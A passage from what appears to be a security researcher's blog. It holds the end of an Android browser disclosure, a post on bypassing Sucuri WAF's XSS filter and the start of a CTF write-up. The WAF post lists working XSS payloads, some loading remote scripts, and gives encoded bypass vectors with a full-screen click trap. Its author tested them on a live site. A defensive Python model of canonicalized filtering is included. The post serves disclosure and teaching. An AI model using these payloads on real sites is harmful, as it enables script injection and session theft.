<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_agLNt89vQ3mwb6wNhNysw-162R4b0d1E6QmCEFbwxJzrCi0Rt7DUBkNegDutZRNAHOoocsRVJLBQznb4Tc_HeNq5yShBQOHG3eqkln92hSBuNVjz0p2JM_j6Kj2PknNLWgXI6BcqyjM/s1600/jaaaaan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_agLNt89vQ3mwb6wNhNysw-162R4b0d1E6QmCEFbwxJzrCi0Rt7DUBkNegDutZRNAHOoocsRVJLBQznb4Tc_HeNq5yShBQOHG3eqkln92hSBuNVjz0p2JM_j6Kj2PknNLWgXI6BcqyjM/s640/jaaaaan.png" width="352" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i>Note: Joe Vennix suggests that you might have to play with the timeout value; he found 1500 - 2000 to work much more consistently. This is because, if the timeout fires too soon (before the NO CONTENT response is received from gmail.com), the new page will just have a blank URL bar.</i></div>
<br />
<h4>
Credits</h4>
The proof of concept was initially created by me; however, it was later modified and improved by "<b>Joe Vennix</b>". I would like to sincerely thank "<b>Tod Beardsley</b>" from the Rapid7 team for handling the disclosure for me. Kudos!<br />
<br />
<h4>
Mitigation</h4>
The Android security team has responded by releasing patches committed to both the KitKat and Lollipop main distributions. Users are advised to contact their carriers to determine whether they have received updated versions of these operating systems.<br />
<h4>
Disclosure Timeline</h4>
Feb 09, 2015: Reported to security@android.com by Rafay Baloch<br />
Mar 26, 2015: Disclosed to Rapid7 and Joe Vennix<br />
Apr 01, 2015: Proof of Concept improved by Joe Vennix<br />
Apr 03, 2015: Reported to security@android.com and CERT/CC by Rapid7<br />
Apr 07, 2015: Vendor responds, patch available on Lollipop<br />
Apr 30, 2015: Vendor responds, patch available on KitKat<br />
May 18, 2015: Public disclosure </div>
Rafay<br />
<b>Sucuri WAF XSS Filter Bypass</b> (published 2015-04-25, updated 2020-05-27)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizlRR64UpfjBfMIK1sy4x-_qOXnq-OKEawI_s1I41HCjrUnzzGea7E-zDl0TyOtGCo8giBVfQJR_iD4_Os4H-uEYShIjtFBXzAg8JsdUT-fuMq9j8bfnuUXvLw4Y1Ni_koqqm9kGZv-EM/s1600/waf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizlRR64UpfjBfMIK1sy4x-_qOXnq-OKEawI_s1I41HCjrUnzzGea7E-zDl0TyOtGCo8giBVfQJR_iD4_Os4H-uEYShIjtFBXzAg8JsdUT-fuMq9j8bfnuUXvLw4Y1Ni_koqqm9kGZv-EM/s1600/waf.png" height="220" width="320" /></a></div>
<h4>
Introduction</h4>
<b>Sucuri Cloud Proxy</b> is a very well known WAF that protects against DoS, SQL injection and XSS attacks and also detects and blocks malware. It acts as a reverse proxy, which means that all traffic sent to an application behind the Sucuri WAF is first sent to Sucuri's network, which (based upon its signature database) checks whether a particular request is legitimate; if it is, the request is allowed to reach the application, otherwise it is blocked.<br />
<br />
Because Sucuri's Cloud Proxy relies on blacklist-based protection to prevent application layer attacks, it caught my interest: it has been proven <a href="http://www.rafayhackingarticles.net/2013/12/code-igniter-xss-filter-multiple.html" rel="nofollow" target="_blank">time after time</a> that blacklist-based protection is insufficient for blocking application layer attacks, specifically cross-site scripting, as there are countless ways JavaScript can be encoded or represented to bypass the protection, and it is therefore very difficult to construct a filter that blocks all possible combinations while yielding a minimum of false positives. ModSecurity is an example: it has a strong XSS filter, but it generates a lot of false positives and in most cases blocks normal, harmless text.<br />
<a name='more'></a><h4>
Example #1</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1QzcIGdR6uEiG2n34DxXYCPhvMpUlQ_KOTMjMK5t-0G5AslnK466vzcE9O0RvEcnm0wCQsM38IVjzZteto2AOCGnVkCFHP4K2b4pvaNdwyEdB6GrDTnAobyq__kadx_MibL-A-zvSaR8/s1600/securi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1QzcIGdR6uEiG2n34DxXYCPhvMpUlQ_KOTMjMK5t-0G5AslnK466vzcE9O0RvEcnm0wCQsM38IVjzZteto2AOCGnVkCFHP4K2b4pvaNdwyEdB6GrDTnAobyq__kadx_MibL-A-zvSaR8/s1600/securi.png" height="336" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see, completely harmless text triggers an alert, because the regular expression matches anything before and after the "src" attribute. </div>
<h4>
Example 2 </h4>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxarCfbDhfHydXt45C2bkCuA8-dbn4PdRH8nEga2rEOCeb5VP4AROQDA7LtKfazpDYMBKx9CNbPHaH8VRUCKeZskQlf1i-pFNr34VHkb4951Sk4W9qErl7KQ3vnC3RnMx8GkkFD3RR-UM/s1600/ttp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxarCfbDhfHydXt45C2bkCuA8-dbn4PdRH8nEga2rEOCeb5VP4AROQDA7LtKfazpDYMBKx9CNbPHaH8VRUCKeZskQlf1i-pFNr34VHkb4951Sk4W9qErl7KQ3vnC3RnMx8GkkFD3RR-UM/s1600/ttp.png" height="382" width="577" /></a></div>
<br />
Notice that in this case as well, valid and completely harmless text is being treated as an XSS attack vector.<br />
<h4>
Sucuri XSS Filter</h4>
Let's get to the main topic. In this post I will reveal one of the many bypasses I found for Sucuri's XSS filter. The full bypass requires user interaction; however, if you follow the linked <a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" rel="nofollow" target="_blank">methodology</a> you should easily be able to construct a bypass that does not require user interaction.<br />
<br />
As per the following <a href="http://cloudproxy.sucuri.net/cross-site-script-protection" target="_blank">link</a>, Sucuri's cloud proxy has a built-in XSS filter capable of detecting and blocking XSS attempts: "<u><b>Our CloudProxy firewall does protect your site against XSS script injections if you want to prevent them from ever being used to compromise your site</b></u>". So I decided to test its effectiveness; however, due to the absence of a testbed, I had to attempt it on a live website. So let's get started.<br />
<h4>
Methodology</h4>
The following is the methodology I utilize when I am up against any WAF:<br />
<br />
<b>i)</b> Brute Force (throwing random payloads and known bypasses for other filters at the WAF to see if any of them get through)<br />
<b>ii)</b> Regex Reversing (the rules are reverse engineered to see what is allowed versus what is not, in order to construct a bypass)<br />
<b>iii) </b>Browser Bugs (when (i) and (ii) fail, I fall back on browser-specific bugs and quirks such as charset inheritance, RPO, etc.)<br />
<br />
For bypassing Sucuri the second method was used, i.e. regular expression reversing.<br />
<h4>
Initial Tests - Brute Force </h4>
I made initial tests with tons of different vectors; however, I quickly figured out that brute forcing would not be the way to bypass this filter.<br />
<br />
<script>alert(0);</script><br />
<scrIpt>prompt(0);</script><br />
<script/src="http://test.com/evil.js"><br />
<script>delete alert;alert(1)</script><br />
<svg><script/href=//?? /> - IE<br />
<script src="https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1"><br />
</script<br />
<svg><script/href= /><br />
<script>confirm(0);</script><br />
<iframe src="javascript:alert(2)"<br />
<form><isindex formaction="javascript&colon;confirm(1)><br />
<embed/code=//goo.gl/nlX0P?<br />
<embed/src=//goo.gl/nlX0P><br />
<object/data=//goo.gl/nlX0P><br />
<isindex action=//goo.gl/nlX0P type=image><br />
<form action=//goo.gl/nlX0P><input type="submit"><br />
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"><br />
<applet code="javascript:confirm(document.cookie);"><br />
<iframe/src="data:text/html,<iframe/src=http://jsfiddle.net/d7Xu7/1/>"><br />
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)<br />
type=image><br />
<isindex x="javascript:" onmouseover="alert(1)"><br />
<h4>
Constructing A Bypass - Regex Reversing</h4>
During my tests I found that the <a tag along with the href attribute was allowed. However, as soon as I entered anything after the =, my vector was blocked.<br />
<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a href=http://www.google.com>CLICK</a></span></b><br />
<b><span style="color: red;"><br /></span></b>
I thought that perhaps the regular expression expects a SPACE after the anchor tag, so I tried a forward slash (/); however, it was blocked too.<br />
<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a/href=http://www.google.com>CLICK</a></span></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgllKsCVGeSe1eCEvSZdJ6yL__yhyvi-SC2dYUXzo2ZeUl5ifB4QMK8IjhvF2IckdJBlu0dW5l7l-iz7Te8YeD0Ub2nQGHKv7ZaSIqu5Em-PahA1IY2noAM6PTKhjUyPEc8iAHiuVckar4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgllKsCVGeSe1eCEvSZdJ6yL__yhyvi-SC2dYUXzo2ZeUl5ifB4QMK8IjhvF2IckdJBlu0dW5l7l-iz7Te8YeD0Ub2nQGHKv7ZaSIqu5Em-PahA1IY2noAM6PTKhjUyPEc8iAHiuVckar4/s1600/1.png" height="283" width="577" /></a></div>
<br />
<br />
The next option was to try characters that can be used instead of a space, such as 0x0c, which stands for "Form Feed", or perhaps newlines.<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a%0c href=http://www.google.com>CLICK</a></span></b><br />
<div>
<br /></div>
I came to the conclusion that the regex only looks for a "<b>Space</b>" or a "<b>Forward slash</b>" between the tag and the href attribute. However, since form feed is only treated as an attribute separator by Google Chrome, I didn't want to produce a browser-specific bypass. So I used the following vector instead.<br />
<div>
<br /></div>
<div>
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a fooooooooooooooooooooooooooo href=http://www.google.com>CLICK</a></span></b></div>
<div>
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4RGOYE_4W8y76B1JuteF8CRwP5dAJ2eetnubdpb_eed-9oyh4Nk2sAxceZaZ94qhgavxEPPPOrikdPNRNjCqM5mMtE5H6fZeZEOxfm9byYR3lxG1UeyrsH1_AIrqldE8KAK3uQj__kvI/s1600/href.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4RGOYE_4W8y76B1JuteF8CRwP5dAJ2eetnubdpb_eed-9oyh4Nk2sAxceZaZ94qhgavxEPPPOrikdPNRNjCqM5mMtE5H6fZeZEOxfm9byYR3lxG1UeyrsH1_AIrqldE8KAK3uQj__kvI/s1600/href.png" height="162" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Here is how the input was being reflected.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUh81W9hgxI4vbxMcMWJdGNmF7XMdZZ_Ubb_7glMj9Xe795XpoHA6Ez9KxRm-qbVEh1gu6f_YuijKhyphenhyphenXcsHHML9Vyu2dyKtUgUYxesO7CtVMzPB8YW5NWCXdlxuR2Gw71xuRvug7ACbQ/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUh81W9hgxI4vbxMcMWJdGNmF7XMdZZ_Ubb_7glMj9Xe795XpoHA6Ez9KxRm-qbVEh1gu6f_YuijKhyphenhyphenXcsHHML9Vyu2dyKtUgUYxesO7CtVMzPB8YW5NWCXdlxuR2Gw71xuRvug7ACbQ/s1600/3.png" height="30" width="577" /></a></div>
<br />
The next step was to use the javascript: scheme to execute JavaScript; however, as expected, it was filtered out.<br />
<div>
<br /></div>
<br />
<b>http://www.site.com/shop.php?c=<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javascript:alert(1)>CLICK</a></span></b><br />
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;"><br /></span></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAI1UOe2i5YBOaEPicuWsbyjGzw1kL0hH1P4gj3LIIzhJpZjGdjxLmJIBz5iC09aYupVmkr_hAyTJ9m7kUa2B6MBO0O6toONgAru0yvPp1q7qBV-MA9Zze6fAzoWRD0BYEB6-1jlrbTg/s1600/444.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAI1UOe2i5YBOaEPicuWsbyjGzw1kL0hH1P4gj3LIIzhJpZjGdjxLmJIBz5iC09aYupVmkr_hAyTJ9m7kUa2B6MBO0O6toONgAru0yvPp1q7qBV-MA9Zze6fAzoWRD0BYEB6-1jlrbTg/s1600/444.png" height="228" width="577" /></a></div>
<br />
The next step was to check whether the regex was case-sensitive. However, the mixed-case payload was also filtered out.<br />
<b><br /></b>
<b>http://www.site.com/shop.php?c=<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javAsCript:alert(1)>CLICK</a></span></b><br />
<br />
The following test was made to check whether the regex was looking for the javascript keyword followed by a colon.<br />
<br />
<b>http://www.site.com/shop.php?c=<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javAsCript:>CLICK</a></span></b><br />
<b><br /></b>
With the above test it was clear that the regular expression looks for the "javascript" keyword followed by a "colon". This can easily be defeated with HTML entities such as<b> &sol; &Tab; &colon; &NewLine;</b>. Apart from that, parentheses were also being blocked, which can likewise be bypassed with their corresponding HTML entities, i.e. <b>&lpar;</b> and <b>&rpar;</b>.<br />
<br />
Inside the href attribute, &colon; can be used instead of "<b>:</b>", as the browser decodes it at runtime.<br />
<br />
<b>http://www.site.com/shop.php?c=4<span style="color: red;">"><a fooooooooooooooooooooooooooo href=javAsCript&colon;test>CLICK</a></span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8CSxBAz-d3TYqFBPtCX3fl8MBWyAKNKuDHWXOMszPV4PhLtUZ3cPZSoyg3y4PZ5Y2Tf-QCrpngcDpgOkQBen8QGrvHlc5Uf6Pa8A0qFnjjXe29opAQkZUzvE6LaqQrxQjo2-Y7cUZz0/s1600/2222.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8CSxBAz-d3TYqFBPtCX3fl8MBWyAKNKuDHWXOMszPV4PhLtUZ3cPZSoyg3y4PZ5Y2Tf-QCrpngcDpgOkQBen8QGrvHlc5Uf6Pa8A0qFnjjXe29opAQkZUzvE6LaqQrxQjo2-Y7cUZz0/s1600/2222.png" height="312" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
However, as can be seen in the figure above, the HTML entities were not being reflected back. This was easily defeated by percent-encoding the <b>&</b> and<b> ; </b>characters (%26 and %3B).<br />
<h4>
Full Bypass</h4>
Combining all the pieces of the puzzle leads to the full bypass:<br />
<br />
<b>http://www.site.com/shop.php?c=4"<span style="color: red;">><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%></span></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhG475PufOkGpqAcdxMLNKDcBZUbgIe7CC9A-dy1lr3oh1jOoNqXwjs59OoTSdSJ9rnHTf_Y3ZEDM9Rp_gX53PBK_G1rn1r5EDoqNlu0YIU4_mby_oQveW1l9kEsKK9-oV8e-bh3CWPFw/s1600/77.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhG475PufOkGpqAcdxMLNKDcBZUbgIe7CC9A-dy1lr3oh1jOoNqXwjs59OoTSdSJ9rnHTf_Y3ZEDM9Rp_gX53PBK_G1rn1r5EDoqNlu0YIU4_mby_oQveW1l9kEsKK9-oV8e-bh3CWPFw/s1600/77.png" height="332" width="577" /></a></div>
<b><br /></b>
<br />
<h4>
Ethical Considerations</h4>
Both the website owner and the vendor have been notified about the vulnerability.<br />
<h4>
In Closing</h4>
WAFs should only be considered an additional layer of protection, not the primary one. Because they rely upon blacklists, in almost all situations it is possible to bypass them.<br />
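As an added example (Python; a model written for this page, not Sucuri's rule set and not code from the post), the two blacklist rules reverse engineered above are expressed as regexes and run first over the raw query value, the way a signature-only WAF sees it, and then over a canonicalized form that applies the percent-decoding and HTML character-reference decoding the value goes through before the browser acts on it; the last function shows the fix that needs no blacklist at all, encoding the value before it is reflected. The samples are constructed from the vectors in this post, with the cut-off full-bypass vector completed with a closing anchor.

```python
import html
import re
from urllib.parse import unquote

# Model of the two blacklist rules reverse engineered in the post (a model, not
# Sucuri's real signature): an anchor whose href is separated from the tag name
# by only spaces or slashes, and the javascript: scheme in any letter case.
NAIVE_RULES = [
    re.compile(r"<a[ /]+href", re.IGNORECASE),
    re.compile(r"javascript\s*:", re.IGNORECASE),
]


def naive_blocks(raw_value: str) -> bool:
    """Match the raw query-string value, exactly as a signature-only WAF would."""
    return any(rule.search(raw_value) for rule in NAIVE_RULES)


def canonicalize(raw_value: str) -> str:
    """Apply the decodings the value goes through before a browser acts on it.

    1. Percent-decoding, repeated until stable, so %26colon%3B (double encoded)
       ends as ':' just as it does after the server decodes once and the browser
       then decodes the resulting &colon; reference.
    2. HTML character-reference decoding (&colon; &lpar; &#58; ...).
    3. ASCII control characters and whitespace (form feed, tab, newline) collapsed
       to one space, since browsers accept them as attribute separators.
    """
    value = raw_value
    for _ in range(3):  # bounded so nested encoding cannot make us loop forever
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = html.unescape(value)
    return re.sub(r"[\x00-\x20]+", " ", value)


# Applied to the canonical form: any attribute list may sit between the tag name
# and href, and whitespace may surround the scheme.
CANONICAL_RULE = re.compile(
    r"<a\b[^>]*\bhref\s*=\s*[\"']?\s*javascript\s*:", re.IGNORECASE
)


def canonical_blocks(raw_value: str) -> bool:
    return CANONICAL_RULE.search(canonicalize(raw_value)) is not None


def reflect_safely(raw_value: str) -> str:
    """The fix that needs no blacklist: HTML-encode before reflecting, so no markup survives."""
    return html.escape(raw_value, quote=True)


# Constructed samples built from the vectors shown in the post. The full-bypass
# vector is cut off in the post and is completed here with a closing anchor.
SAMPLES = {
    "plain_slash": '"><a/href=javascript:alert(1)>CLICK</a>',
    "entities_raw": '"><a foo href=javascript&colon;alert&lpar;1&rpar;>CLICK</a>',
    "bogus_attr_double_encoded": (
        '"><a fooooooooooooooooooooooooooooooooo '
        "href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B>CLICK</a>"
    ),
    "update1_numeric_ref": '"><a%20x%20href=javascript%26%2358%3Bprompt(1)>a</a>',
    "harmless": "I changed the img src attribute and the script tag yesterday",
}


def evaluate(samples=SAMPLES):
    """Per sample: (naive rule blocks it, canonical rule blocks it, markup left after encoding)."""
    return {
        name: (naive_blocks(v), canonical_blocks(v), "<" in reflect_safely(v))
        for name, v in samples.items()
    }


if __name__ == "__main__":
    for name, (naive, canonical, leaks) in evaluate().items():
        print(f"{name:26} naive={naive!s:5} canonical={canonical!s:5} markup_after_encoding={leaks}")
```

Only the first sample trips the raw-value rules, while every script-bearing sample trips the rule applied after canonicalization; the harmless sentence is blocked by neither, and encoding leaves no markup in any of them.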
<br />
<b>Update 1:</b> It seems that Sucuri has just blocked the "<b>Prompt</b>" keyword; the following vector bypasses it - <b> <a%20x%20href=javascript%26%2358%3Bprompt(1)>a</a> </b> <b>credits<span style="color: red;"> @mmrupp</span></b><br />
<b><span style="color: red;"><br /></span></b>
<b>Update 2:</b> It seems that Sucuri is now blocking the "Prompt" as well as the "Confirm" keyword; the following vectors bypass it -<br />
<b><br /></b>
<b> <q oncut=\u0070rompt(2)> </b><br />
<b>"><p id=""onmouseover=\u0070rompt(1) //</b><br />
<b><br /></b>
<b>Update 3: </b> @soaj1664ashar found another way to bypass the filter:<br />
<br />
<b>"><p id="\u0070rompt(1)"onmouseover=\u0065val(id) //</b><br />
<br />
<b>Update 4: </b>Mathias Karlson used a neat trick to bypass the Sucuri XSS filter yet again: he figured out that the a="b" attribute trick works against it. I added a little CSS magic to make the user interaction unavoidable.<br />
<br />
<a id="a"href=javascript&colon;alert&lpar;1&rpar; id="a">Click</a><br />
<h4>
Unavoidable User Interaction</h4>
The above bypass can be combined with CSS magic so that the user interaction becomes unavoidable.<br />
<b><br /></b>
<b><a+id="a"href=javascript%26colon;alert%26lpar;1%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Click me plz</a></b></div>
CSP 2015 Capture The Flag Writeup: by Rafay (http://www.blogger.com/profile/15944091083959815608), published 2015-04-18, updated 2020-05-27<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjub93URWW5oLhwJSwL2YIK6h9zcIZVETRSmD5jGeEJYLuNLtiLIGy7F4nIa4uIyyKR60N9jRZ68Vi4NksA1xDDpHamW4nBqL7oXV_m497W4RO3wJeBleLklvdqe6kr36YnDJGyJGop7jQ/s1600/ctf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjub93URWW5oLhwJSwL2YIK6h9zcIZVETRSmD5jGeEJYLuNLtiLIGy7F4nIa4uIyyKR60N9jRZ68Vi4NksA1xDDpHamW4nBqL7oXV_m497W4RO3wJeBleLklvdqe6kr36YnDJGyJGop7jQ/s1600/ctf.png" height="284" width="320" /></a></div>
<br />
On 11th April <b>Giuseppe Trotta</b> and I organized a CTF (Capture The Flag) competition for <b>Cyber Secure Pakistan</b> (a conference that brings together all the stakeholders). The challenge was hosted on hack.me and contained 9 different challenges, some of which themselves contained sub-challenges. Overall, we received great feedback from the vast majority of participants. No one was able to solve all the challenges within the given time frame; however, a day or two later we noticed that the team of "<b>Sajjad</b>" and "<b>MakMan</b>" had managed to solve them, and they were kind enough to do the writeup for the challenge. So over to Sajjad for the writeup.
<br />
<a name='more'></a><br />
I teamed up with a very talented friend of mine to solve the challenges. He goes by the nickname "<b>MakMan</b>" and possesses extraordinary problem solving and penetration testing skills. We solved almost all challenges together.<br />
I want to keep this write-up precise, so I will not ramble on much about what I tried and failed. Instead, I will explain the steps I went through in each challenge to exploit the vulnerability and capture its flag. I am going to cover them in descending order of the time I had to spend on each challenge.<br />
<br />
<u>Note:</u> You might notice that I didn't use threading in any of my scripts to make them faster. The reason is that I was afraid of getting my IP address banned by the server for sending requests too fast; I was also afraid of overloading the server by sending too many requests at a time. And in some scenarios it was not feasible to use threading.<br />
<h4>
9. Authentication Bypass (via cookie manipulation)</h4>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4wa49ZAgh-xqTjVJBCBek56c3rTX92eAux51DVDhcEYhQ-zP1xmYTz98qQQA_thewTdm3g12n1H0Ui15DFwJ3bJLifoDXw8gWvykPIHhkBWEAFECb3qTsiRGZDbpjFRG1FYq9PkAN_Po/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4wa49ZAgh-xqTjVJBCBek56c3rTX92eAux51DVDhcEYhQ-zP1xmYTz98qQQA_thewTdm3g12n1H0Ui15DFwJ3bJLifoDXw8gWvykPIHhkBWEAFECb3qTsiRGZDbpjFRG1FYq9PkAN_Po/s1600/1.png" height="124" width="577" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This was the very first challenge I attempted in this CTF and, upon solving it, I found it to be the easiest. A simple sign-in page was provided on the main page (index.php), which can be seen in the screenshot below.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNjnTBLhnJNwC5XI8w0uJoH1bTFNZPWR1Xe4NclyXvuxEHYuFLc4l7lxYX3H96PkNd94ZBXjQOa1ZN0VMAFR9XaeJwSECMH-QB77NpJk-2M2DnSnpuKse9bEmJHZ3hahtuCk7IDIWpFc4/s1600/1.1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNjnTBLhnJNwC5XI8w0uJoH1bTFNZPWR1Xe4NclyXvuxEHYuFLc4l7lxYX3H96PkNd94ZBXjQOa1ZN0VMAFR9XaeJwSECMH-QB77NpJk-2M2DnSnpuKse9bEmJHZ3hahtuCk7IDIWpFc4/s1600/1.1.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
At first, I expected it to be a simple SQL injection (<i>x' or 'x'='x</i>) bypass, but it didn't take long to figure out that that was not the case, so I started analyzing the headers and cookies and found an interesting cookie named "admin" with its value set to '<b>0</b>'. At this point I was sure that it was a <b>cookie manipulation vulnerability</b>, so I simply modified the cookie value and set it to '<b>1</b>'. After that, all I had to do was submit the form with any username and password. The screenshot below shows the result of the form submission after cookie manipulation.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaQRGUL_D_LNAAEQBUOqcVTkXjC30JOt0d9Zb1L2zbJRMFK7niicDBt-9RLjnIqCgsmDn0tntw25lKeamLCwu0ybDatYGoD_oX3hcu0eiG9jG8aPJm5x68Ob7shmD61w6kfwA8gq-H7Y/s1600/Screenshot_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEaQRGUL_D_LNAAEQBUOqcVTkXjC30JOt0d9Zb1L2zbJRMFK7niicDBt-9RLjnIqCgsmDn0tntw25lKeamLCwu0ybDatYGoD_oX3hcu0eiG9jG8aPJm5x68Ob7shmD61w6kfwA8gq-H7Y/s1600/Screenshot_1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
The MD5 hash of this key was the flag for this challenge.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
8. PHP Object Injection (via "unserialize" function)</h4>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijvXTJV8bGpRavv5BlwE1GZ6AyGEfuOYZxoxbY4SYe74p3VL5jkiFqXTFzAsB3y5gbR10ajvTuVzkvatuOJbBZRZJk5L1qkD0mmN3nhNh9PNN4C2Ylcdy40TwGGjcAnWrwMuU0ZsvrvME/s1600/Screenshot_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijvXTJV8bGpRavv5BlwE1GZ6AyGEfuOYZxoxbY4SYe74p3VL5jkiFqXTFzAsB3y5gbR10ajvTuVzkvatuOJbBZRZJk5L1qkD0mmN3nhNh9PNN4C2Ylcdy40TwGGjcAnWrwMuU0ZsvrvME/s1600/Screenshot_2.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This challenge was worth 300 points, which in my opinion it did not deserve. It was a simple PHP object injection which I believe (according to my limited knowledge) can only be exploited if some information about the source code is known. At first the source code was not provided; even the name of the class (which had the exploitable magic method) was not mentioned. Later the source code was provided, which made it a very easily solvable challenge.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Anyway, coming back to the agenda: the main page (unserialize.php) of this challenge had a form, which can be seen in the screenshot below.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
